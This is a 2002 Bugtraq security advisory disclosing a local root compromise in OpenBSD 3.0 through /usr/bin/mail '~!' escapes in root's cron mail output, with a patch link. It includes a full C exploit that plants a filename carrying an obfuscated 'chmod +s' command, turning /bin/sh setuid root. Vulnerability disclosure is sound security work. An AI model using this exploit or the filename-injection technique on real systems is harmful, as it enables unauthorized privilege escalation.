Bugtraq mailing list archives
local root compromise in openbsd 3.0 and below
From: Przemyslaw Frasunek <venglin () freebsd lublin pl>
Date: Thu, 11 Apr 2002 13:29:28 +0200
There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr 2002). Full problem report and exploit below. FreeBSD is not vulnerable. ----- Forwarded message from urbanek () openbsd cz ----- From: urbanek () openbsd cz To: gnats () openbsd org Subject: user/2536: possible root compromise using /usr/bin/mail
Number: 2536 Category: user Synopsis: crontab entry allows possible arbitrary comand execution Confidential: yes Severity: critical Priority: high Responsible: bugs State: open Class: sw-bug Submitter-Id: net Arrival-Date: Mon Apr 8 13:30:02 MDT 2002 Last-Modified: Originator: Milos Urbanek Organization:
Release: all relases including CURRENT Environment:
System : OpenBSD 3.0 Architecture: OpenBSD.i386 Machine : i386
Description:
program /usr/bin/mail allows a special escape sequence to be specified in the body of an email; this escape sequence specifies a shell comand to be executed as mentioned in mail(1): ~!command Execute the indicated shell command, then return to the message. Problem: default root crontab entry looks like: # do daily/weekly/monthly maintenance # on monday only (techie) 30 1 * * 1 /bin/sh /etc/daily 2>&1 | tee /var/log/d aily.out | mail -s "`/bin/hostname` daily output" root 30 3 * * 6 /bin/sh /etc/weekly 2>&1 | tee /var/log/ weekly.out | mail -s "`/bin/hostname` weekly output" root 30 5 1 * * /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root If there is something in files /etc/daily, /etc/weekly or /etc/monthly which could enable the attacker to insert its own input, like a malformed filename chiba:5$ touch \~!haha chiba:6$ ls -al *haha* -rw-r--r-- 1 milos milos 0 Apr 8 19:30 ~!haha or by other means like output from log files under /var/log, the attacker can execute arbitrary comand running under root privileges which can lead to the root compromise.
How-To-Repeat:
read the man page, and see above [...] ----- End forwarded message ----- Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24 Exploit: /* * (c) 2002 venglin () freebsd lublin pl * * OpenBSD 3.0 (before 08 Apr 2002) * /etc/security + /usr/bin/mail local root exploit * * Run the exploit and wait for /etc/daily executed from crontab. * /bin/sh will be suid root next day morning. * * Credit goes to urbanek () openbsd cz for discovering vulnerability. * */ #include <fcntl.h> int main(void) { int fd; chdir("/tmp"); fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777); if (fd) close(fd); } -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *
Current thread:
- local root compromise in openbsd 3.0 and below Przemyslaw Frasunek (Apr 11)
- Re: local root compromise in openbsd 3.0 and below Solar Designer (Apr 11)
- Re: local root compromise in openbsd 3.0 and below Manuel Bouyer (Apr 12)
- Re: local root compromise in openbsd 3.0 and below Brett Glass (Apr 15)
- Re: local root compromise in openbsd 3.0 and below Manuel Bouyer (Apr 15)
- Re: local root compromise in openbsd 3.0 and below Brett Glass (Apr 15)